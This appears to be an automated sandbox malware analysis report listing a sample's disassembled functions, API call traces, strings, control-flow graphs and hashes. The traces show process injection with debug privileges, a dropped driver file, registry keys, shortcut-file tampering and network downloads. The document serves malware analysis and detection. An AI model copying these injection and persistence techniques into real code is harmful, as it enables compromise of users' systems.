                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01440C0E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: CloseHandle.KERNEL32(?), ref: 01440C2A
                                                                                                                                                                                                                                                                                              • Part of subcall function 01440B9A: DeleteFileA.KERNEL32(?), ref: 01440C37
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 01443F1F
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(C:\Windows\), ref: 01443F2A
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\,01433E20), ref: 01443F46
                                                                                                                                                                                                                                                                                            • GetComputerNameA.KERNEL32(00000000,00000080), ref: 01443F64
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01443F71
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01443F8F
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(Software\Hwdq,Software\), ref: 01443FD3
                                                                                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000080), ref: 01443FF1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01443FFE
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,01432364), ref: 01444017
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01444055
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(Software\Hwdq), ref: 014440D0
                                                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(000000E4,C:\Windows\ueqe.log), ref: 014440FC
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(C:\Windows\ueqe.log), ref: 01444107
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\ueqe.log,01433E30), ref: 01444123
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(C:\Windows\ueqe.log,01432100), ref: 01444145
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(C:\Windows\ueqe.log,C:\Windows\), ref: 01444157
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0144417F
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(C:\Windows\ueqe.log), ref: 014441F4
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\ueqe.log,0143266C), ref: 01444211
                                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,01432370), ref: 0144422A
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(67320627207), ref: 01444357
                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 014443AA
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 014443BD
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,01433E34,?), ref: 01444474
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01444482
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,0143226C), ref: 014444B8
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,00000080), ref: 014444C8
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys), ref: 014444D3
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,01433E38), ref: 014444EF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,01432288), ref: 01444501
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(C:\Windows\system32\drivers\qijmfn.sys,?), ref: 01444513
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01444520
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01444532
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
                                                                                                                                                                                                                                                                                            • String ID: 67320627207$C:\Windows\system32\drivers\qijmfn.sys$C:\Windows\ueqe.log$Software\$Software\Hwdq$n$userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 1097455987-260886683
                                                                                                                                                                                                                                                                                            • Opcode ID: 40a24a982668e5d33eb7901b067d0dfd105d36e336266eb4b74596f62768f0dd
                                                                                                                                                                                                                                                                                            • Instruction ID: 37fabfd3861926651c6c69a2412deafeaa1f1af45735529a5d525e8d357dc313
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a24a982668e5d33eb7901b067d0dfd105d36e336266eb4b74596f62768f0dd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D842C6B1A006149FEB24DF64DC88BEAB7B5BF4CB05F144199E709A72A4D7705A80CF54
                                                                                                                                                                                                                                                                                            Function 0143E329 Relevance: 96.7, APIs: 42, Strings: 12, Instructions: 2219COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                                                                            • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                                                                                                                                                                                                                                                                            • API String ID: 367298776-1942104897
                                                                                                                                                                                                                                                                                            • Opcode ID: 762b92fba7d6d788395157fd7ff3eeddea79a09d9c307bfb32a3a6dc7b6c3dec
                                                                                                                                                                                                                                                                                            • Instruction ID: c37974bc76202418140c99e3d692d15046cb999af877c9eaac30293036d2be43
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 762b92fba7d6d788395157fd7ff3eeddea79a09d9c307bfb32a3a6dc7b6c3dec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4334BB5D01219DBDB24CF58CC80BE9B7B5BF98304F1841EAE10AAB294D7319E85CF54
                                                                                                                                                                                                                                                                                            Function 01441EF6 Relevance: 75.6, APIs: 38, Strings: 5, Instructions: 382memorythreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 681 1441ef6-1441ff4 call 1448060 OpenProcess 684 14421a7-14421bf OpenProcessToken 681->684 685 1441ffa-1442003 GetLastError 681->685 686 14421c1-14421c8 684->686 687 14421cd-14421e9 GetTokenInformation 684->687 688 1442009-1442040 GetVersionExA 685->688 689 144219b-14421a2 685->689 690 14424ab-14424b2 686->690 693 14421f7-1442200 GetLastError 687->693 694 14421eb-14421f2 687->694 691 1442042-1442049 688->691 692 144204e-1442072 GetCurrentThread OpenThreadToken 688->692 689->690 697 14424b4-14424c1 CloseHandle 690->697 698 14424cb-14424d2 690->698 691->690 695 1442074-144207f GetLastError 692->695 696 14420b3-1442103 LookupPrivilegeValueA AdjustTokenPrivileges 692->696 699 1442202-1442209 693->699 700 144220e-1442231 GetProcessHeap RtlAllocateHeap 693->700 694->690 701 1442081-1442088 695->701 702 144208d-14420a5 GetCurrentProcess OpenProcessToken 695->702 707 1442105-1442119 CloseHandle 696->707 708 144211e-1442129 GetLastError 696->708 697->698 703 14424d4-14424db CloseHandle 698->703 704 14424e1-14424e8 698->704 699->690 705 1442233-144223a 700->705 706 144223f-1442265 GetTokenInformation 700->706 701->690 702->696 709 14420a7-14420ae 702->709 703->704 710 1442500-1442513 704->710 711 14424ea-14424fa GetProcessHeap HeapFree 704->711 705->690 712 1442267-144226e 706->712 713 1442273-14422b9 LookupAccountSidA 706->713 707->690 714 1442144-144218b OpenProcess AdjustTokenPrivileges CloseHandle 708->714 715 144212b-144213f CloseHandle 708->715 709->690 711->710 712->690 716 14422c7-14422d0 713->716 717 14422bb-14422c2 713->717 718 144218d-1442194 714->718 719 1442199 714->719 715->690 720 1442330-1442337 716->720 721 14422d2-14422e6 lstrcmpiA 716->721 717->690 718->690 719->684 720->690 722 1442314-1442329 CreateMutexA 721->722 723 14422e8-14422fc lstrcmpiA 721->723 722->690 723->722 724 14422fe-1442312 lstrcmpiA 723->724 724->722 725 144232e-1442364 VirtualAllocEx 724->725 727 1442366-144238a WriteProcessMemory 725->727 728 14423cd-14423f5 VirtualAllocEx 725->728 729 144238c-1442393 727->729 730 1442398-14423b8 CreateRemoteThread 727->730 731 1442492-1442499 728->731 732 14423fb-1442455 call 144772b lstrlen call 144772b WriteProcessMemory 728->732 729->690 733 14423c6 730->733 734 14423ba-14423c1 730->734 731->690 739 1442457-144245e 732->739 740 1442460-1442480 CreateRemoteThread 732->740 733->728 734->690 739->690 741 1442482-1442489 740->741 742 144248b 740->742 741->690 742->731
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 01441FE1
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01441FFA
                                                                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 01442033
                                                                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 01442063
                                                                                                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000), ref: 0144206A
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 01442074
                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 014421B7
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 014424BB
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 014424DB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 014424F3
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 014424FA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                                                                                                                                                                                                            • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                                                                                                                                                                                                            • API String ID: 3470919082-3830299594
                                                                                                                                                                                                                                                                                            • Opcode ID: bfd3a023e785a0738a4d61b14aa51be4cd844eb4f10d14b165be5d6bd065cba6
                                                                                                                                                                                                                                                                                            • Instruction ID: cb139d82630a6d0bb8af75535b0b64efec002255214d37ef55915ae310b2393c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd3a023e785a0738a4d61b14aa51be4cd844eb4f10d14b165be5d6bd065cba6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF14EB5A00258EBEB30CFA4DD48FEABB74FB48711F104299F215A62E4D7B45A85CF50
                                                                                                                                                                                                                                                                                            Function 01441060 Relevance: 45.8, APIs: 20, Strings: 6, Instructions: 340stringsleepfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 743 1441060-14410d2 Sleep 744 14410d4-14410e9 lstrcat 743->744 745 14410ec-14410ff call 1438deb 743->745 744->745 748 1441117-144113b lstrcat FindFirstFileA 745->748 749 1441101-1441112 745->749 751 1441141-1441151 FindNextFileA 748->751 752 144144c-1441457 748->752 750 14414c8-14414d8 749->750 751->752 753 1441157-1441161 751->753 754 1441492-14414af 752->754 755 1441459-1441461 752->755 757 1441165-144116e 753->757 758 1441163 753->758 760 14414b1-14414b5 FindClose 754->760 761 14414bb-14414c6 Sleep 754->761 755->754 759 1441463-1441467 755->759 762 1441175-1441179 757->762 763 1441170 757->763 758->751 759->754 764 1441469-144146d 759->764 760->761 761->750 765 144119f-14411b7 lstrlen 762->765 766 144117b-1441199 Sleep 762->766 763->752 764->754 767 144146f-1441488 call 1440e71 764->767 769 14411c7-1441201 lstrcat lstrlen * 2 765->769 770 14411b9-14411c2 765->770 766->765 767->754 772 1441297-14412a2 769->772 773 1441207-144121c lstrcmpiA 769->773 770->751 774 1441381-1441394 772->774 775 14412a8-14412b0 772->775 776 1441236-144123d 773->776 777 144121e-1441234 lstrcmpiA 773->777 779 144143e-1441447 774->779 780 144139a-14413a4 774->780 775->774 778 14412b6-14412c0 775->778 781 1441248-1441257 776->781 777->772 777->776 782 14412c2-14412d8 call 1438deb 778->782 783 144133d-1441353 call 1438deb 778->783 779->751 780->779 784 14413aa-14413f5 lstrcpy lstrlen lstrcmpiA 780->784 785 1441287-1441294 call 143e329 781->785 786 1441259-1441275 call 1438deb 781->786 782->783 798 14412da-14412f0 call 1438deb 782->798 783->774 802 1441355-1441368 call 1440cf6 783->802 788 1441424-144143b 784->788 789 14413f7-144141c call 1441060 784->789 785->772 800 1441285 786->800 801 1441277-1441282 call 143a26e 786->801 788->779 799 1441421 789->799 798->783 812 14412f2-1441338 lstrcpy lstrcat 798->812 799->788 800->781 801->800 810 1441374-1441378 802->810 811 144136a-144136e DeleteFileA 802->811 810->774 813 144137a 810->813 811->810 812->783 813->774
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?,?), ref: 014410BF
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D20), ref: 014410DD
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01433D24), ref: 01441120
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0144112E
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 01441149
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 01441199
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014411A6
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 014411DB
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014411E5
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014411F8
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,014326F0), ref: 01441214
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,014326F8), ref: 0144122C
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(-014AB270,?), ref: 0144130C
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(-014AB270,.lnk), ref: 0144132A
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0144136E
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 014413B8
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014413C5
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,0143260C), ref: 014413ED
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 014414B5
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 014414C0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                            • String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
                                                                                                                                                                                                                                                                                            • API String ID: 3707883041-2096895072
                                                                                                                                                                                                                                                                                            • Opcode ID: a1b29539057227f5de0bbe3e07d7ed8a21855d7803c90f5c3b113e417ae6153f
                                                                                                                                                                                                                                                                                            • Instruction ID: 1585af130b0a9b2d22756f976f21d71737ba2adc69273aa09211dcf7d3b3e087
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1b29539057227f5de0bbe3e07d7ed8a21855d7803c90f5c3b113e417ae6153f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50D1CDB5A0020A9BEB14CF68D884BAF7BB5FF48B01F148119F915EB355C734E851CB64
                                                                                                                                                                                                                                                                                            Function 0143A2F5 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 150stringsleepfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32 ref: 0143A374
                                                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000100,00000000), ref: 0143A386
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143A393
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433CAC), ref: 0143A3B2
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143A3CC
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0143A3E6
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433CB0), ref: 0143A3F8
                                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,00000000), ref: 0143A422
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 0143A449
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 0143A473
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143A480
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0143A493
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,014326F0), ref: 0143A4AF
                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,_Rar), ref: 0143A4F3
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000100), ref: 0143A511
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0143A52C
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000927C0), ref: 0143A537
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0143A544
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                                                                                                                                                                                                                                                                            • String ID: _Rar
                                                                                                                                                                                                                                                                                            • API String ID: 932915221-536834240
                                                                                                                                                                                                                                                                                            • Opcode ID: 9dfc5e84df52c0c5cdf5a5dd6775ef24f90189113242e5704b7c8d4bb9ae2eea
                                                                                                                                                                                                                                                                                            • Instruction ID: c166476b3c5647f304c060af70e61859ebd2e9bd1d8dd9107eabf0c66bfdddd0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dfc5e84df52c0c5cdf5a5dd6775ef24f90189113242e5704b7c8d4bb9ae2eea
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A51B3759002189BDB20CB74DC48BEEBB79AB88B05F1045E9E60EE61A4DB749BC4CF50
                                                                                                                                                                                                                                                                                            Function 01437A3A Relevance: 15.1, APIs: 10, Instructions: 122networkthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • htons.WS2_32(00000EDC), ref: 01437AE9
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 01437B06
                                                                                                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 01437B44
                                                                                                                                                                                                                                                                                            • bind.WS2_32(?,00000002,00000010), ref: 01437B5A
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 01437C31
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01437C39
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitThreadUserbindclosesockethtonssetsockoptsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3895830221-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 16396cdac5197151bab67bf1d040fa64f4cd1ff627af22c7b071e67665070172
                                                                                                                                                                                                                                                                                            • Instruction ID: ebfc5125e9764fcc8cf90488feda61879e6d8e0568dd90a9b9a13de3c36af8ca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16396cdac5197151bab67bf1d040fa64f4cd1ff627af22c7b071e67665070172
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D512CB0E403989BEB348F64CC49BD9B6B4BB4C741F0041D9E399AA294D7F45AC48F58
                                                                                                                                                                                                                                                                                            Function 01440945 Relevance: 13.6, APIs: 9, Instructions: 146networkfilestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 014409A3
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A677: GetTickCount.KERNEL32 ref: 0143A6C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A677: GetTickCount.KERNEL32 ref: 0143A6E6
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A677: lstrlen.KERNEL32(?,014326B8,00000000), ref: 0143A6F8
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A677: wsprintfA.USER32 ref: 0143A704
                                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(01432120,00000001,00000000,00000000,00000000), ref: 01440A18
                                                                                                                                                                                                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 01440A4A
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 01440A7F
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 01440AA5
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01440AED
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01440B5D
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 01440B73
                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 01440B89
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
